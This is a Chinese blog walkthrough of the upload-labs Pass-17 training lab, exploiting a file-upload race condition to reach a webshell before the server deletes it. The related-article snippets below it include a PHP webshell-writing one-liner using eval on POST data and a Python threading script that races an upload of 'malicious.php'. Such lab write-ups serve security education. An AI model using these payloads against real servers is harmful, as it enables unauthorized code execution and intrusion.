【upload-labs】————18、Pass-17

最新推荐文章于 2025-05-22 11:43:59 发布
最新推荐文章于 2025-05-22 11:43:59 发布
阅读量799 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 【渗透测试实战2】 # upload-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Fly_hps/article/details/99657695

查看源代码:

竞争条件:这里先将文件上传到服务器,然后通过rename修改名称,再通过unlink删除文件,因此可以通过条件竞争的方式在unlink之前,访问webshell。

首先在burp中不断发送上传webshell的数据包

之后不断在浏览器中刷新,刷新,在刷新。。。。。,你会看到下面的结果:

 

upload-labs18
qq_46527080的博客
12-25 2573
漏洞介绍 条件竞争漏洞是一种服务器端的漏洞,是由于开发者设计应用程序并发处理时操作逻辑不合理而造成。当应用面临高并发的请求时未能同步好所有请求,导致请求与请求之间产生等待时出现逻辑缺陷。该漏洞一般出现在与数据库系统频繁交互的位置,例如金额同步、支付等较敏感操作处。另外条件竞争漏洞也会出现在其他位置,例如文件的操作处理等。 首先将文件上传到服务器,然后检测文件后缀名,如果不符合条件,就删掉,典型的“引狼入室”。 第十八关(条件竞争) 源码分析 首先准备一个创建shell的php <?php fputs
Upload-Lab第18关:巧用条件竞争,轻松绕过上传限制!
didiplus
08-24 1078
进入第18关后,通过提示发现这一关与之前的挑战有所不同。线索似乎隐藏在源码中。接下来,让我们一起审计和分析代码,寻找突破口。}else{$msg = "只允许上传.jpg|.png|.gif类型文件!}else{$msg = '上传出错!从源码来看,服务器首先将上传的文件保存下来,然后将文件的后缀名与白名单进行对比。如果文件扩展名是jpgpng或gif中的一种,就会对文件进行重命名。如果不符合这些扩展名,unlink()函数会删除该文件。
upload-labs 18
LuckySec
11-09 1437
题目 查看代码 分析,本关对文件后缀名做了白名单判断, 然后一步一步检查文件大小、文件是否存在等等, 将文件上传后,对文件重新命名 同样存在条件竞争的漏洞。 不断利用burp发送上传图片马的数据包,由于条件竞争, 程序会出现来不及rename的问题,从而上传成功 ...
upload-labs通关笔记-18关文件上传之条件竞争
最新发布
mooyuan的网络安全博客
05-22 961
本文通过《upload-labs通关笔记-18关文件上传之条件竞争》系列。文件上传条件竞争是一种在文件上传过程中利用并发操作导致的时间差来绕过安全限制的攻击方式,本节进行条件竞争绕过渗透实战。
文件上传upload-labs18关 条件竞争
YYYYU_ZHIZZZ的博客
11-08 937
文件上传靶场练习条件竞争
upload_labs_pass18_条件竞争
qq_51550750的博客
04-12 3951
pass1818关和前面14-17关(要求上传图片马)不同,直接要求上传一个webshell 提示: 源码: $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp
Upload-labs靶场Pass01-Pass21全解
beiweixiaotian66的博客
07-31 1453
UPload-labs小练习
upload-labs靶场详解
lizhiiiii的博客
04-17 1457
使用小皮集成环境来完成这个靶场 将文件放到WWW目录下就可以进行访问。
文件上传漏洞upload-labs1-19关详解
qq_51780583的博客
03-07 2434
upload-labs1-19关详解
生命在于折腾——upload-labs
易水哲的博客
08-25 1200
Upload-labs练习
Upload-labs-master实验笔记:Pass18(条件竞争)
大大大蜜蜂的博客
03-28 1500
Upload-labs-master实验笔记:Pass18 以部分源码为例: 可以看到,该源码功能大概是,当我们上传一个文件后,文件会先上传到服务器,然后再判断该文件类型是否含在白名单中(jpg、png、gif),如果是,则会将该文件重命名后放在服务器中,如果不是,则会将该文件删除掉。那么我们可以知道,文件是先被上传到了服务器,而后才做判断之类的一系列操作,这样就存在条件竞争漏洞。 1.首先我们的思路是:可以使用burpsuit抓包软件中的Intruder模块,创建两个自动攻击方案,第一个自动攻击方案是
[网络安全]upload-labs Pass-18 解题详析_upload-labs18关条件竞争
2401_84972676的博客
05-13 565
创建一个允许上传的文件扩展名数组$ext_arr,包括了允许上传的图片类型(jpg、png、gif)。根据定义的上传路径UPLOAD_PATH和文件名生成待存储的文件路径$upload_file。在移动成功的情况下,使用in_array函数检查文件扩展名是否在允许上传的类型数组中。如果文件扩展名不在允许上传的类型数组中,记录错误信息$msg,并删除已上传的文件。如果有,则开始处理文件上传。如果文件扩展名在允许上传的类型数组中,生成一个随机的文件名。msg为空,来初始化文件上传的状态和错误信息。
upload-labs:pass-18
羽的博客
07-11 210
告诉我需要代码审计。 OK,打开源码看看。 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp_name']; $file_ext = sub...
upload-labs(Pass-18 ~ Pass-21)
m0_64849639的博客
08-23 1208
所以我们只要上传的文件后缀不是白名单中的,该文件就还是会被删除2、思路:由于该文件后缀不是白名单中的,该文件就还是会被删除;但是,服务器删除该php文件是有一定的延迟的,若我们在这延迟中访问了该php代码,那么就会在当前目录生成shell.php文件3、实践:(1)、抓包进入爆破模块:(2)发包:此时就在源源不断的上传文件1.php,服务器也在一直删除该文件;
upload-labs通关(第18-第19关)
qq_73985955的博客
08-06 1177
在这关它先把文件上传至网站目录, 然后才对文件进行检验来决定是否删除这个文件,所以我们可以通过burpsuite发送大量的上传文件和访问所创建的webshell文件的请求,从而绕过代码的限制,上传后门文件。这关不知道是不是代码有问题,还是我的配置有问题,我这直接用文件包含漏洞就能上传上去,我还看了其他人的wp,他们的都是用白名单+条件竞争+apache解析漏洞或者白名单+条件竞争+文件包含漏洞。接下来我们开始攻击,我们要分别点击上传请求的开始攻击按钮和文件访问的按钮(如果只点一个,它只会攻击一个)
upload-labs 18-21关 详解 (完结)
qq_53409748的博客
03-02 1191
upload-labs 18-21关 详解 (完结)
Upload-labs 18 条件竞争——通关
W小哥
01-13 4524
访问目标站点,提示上传图片马 查看源码 思路:上传shell.php.7z图片木马配合解析漏洞 实验步骤: 图片中php一句话木马代码:<?php fputs(fopen('shell2.php','w'),'<?php @eval($_POST["x"])?>’);?> 第一种:使用python脚本 第一步:burpsuite抓包,上传文件名字shell.php.7z...
UPLOAD LABS | PASS 18 - 逻辑漏洞 - 条件竞争
Blue17 の 小窝
12-06 1199
我们可以上传一个生成木马的文件,然后在服务端来不及删除它时,访问该文件,让该文件生成一个木马放到服务端,由于脚本生成的新木马不属于上传的,所以服务端不会删除这个木马。仔细分析代码,可以发现,目标会先将我们上传的文件进行保存,当保存后,再对其校验合法性,在其代码校验合法性期间,我们上传的文件其实已经被其保存到服务端了。但是呢,如果我们尝试去连接这个不稳定的文件,会发现,连接不了的,在你连接期间这个文件就会被删除。如上,我们利用条件竞争攻击,直接在目标服务器生成了一个稳定的 shell.php。
upload-labs pass17
12-27
### 关于Upload-Labs Pass-17 的分析 在 Upload-Labs 中,Pass-17 主要涉及白名单机制下的资源竞争漏洞[^3]。此关卡设计用于测试上传文件过程中可能存在的竞态条件(race condition),即两个操作依赖相同的资源但在不同时间发生。 #### 资源竞争概述 当服务器处理文件上传请求时,在验证文件合法性与实际保存之间存在短暂的时间窗口。攻击者可以利用这段时间差替换合法文件为恶意脚本,从而绕过安全检测。 #### 实现细节 为了成功完成这一挑战,通常需要满足以下几个要素: - **快速响应**:确保客户端能够迅速发送第二个HTTP请求以覆盖原始上传文件。 - **同步控制**:精确把握两次请求之间的时机,使第二次请求恰好发生在第一次请求被接受但还未完全处理完毕之时。 下面是一个简单的Python脚本示例,展示了如何模拟这种攻击行为: ```python import requests from threading import Thread def upload_file(file_path, url): files = {'file': open(file_path,'rb')} r = requests.post(url,files=files) if __name__ == "__main__": target_url = 'http://your-target-url.com/upload' # 启动线程执行正常图片上传 t1 = Thread(target=upload_file,args=('normal_image.jpg',target_url)) t1.start() # 稍作延迟后启动另一个线程尝试覆盖原文件 time.sleep(0.5) t2 = Thread(target=upload_file,args=('malicious.php',target_url)) t2.start() t1.join() t2.join() ``` 上述代码片段仅作为学习目的展示,并不应应用于非法用途。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值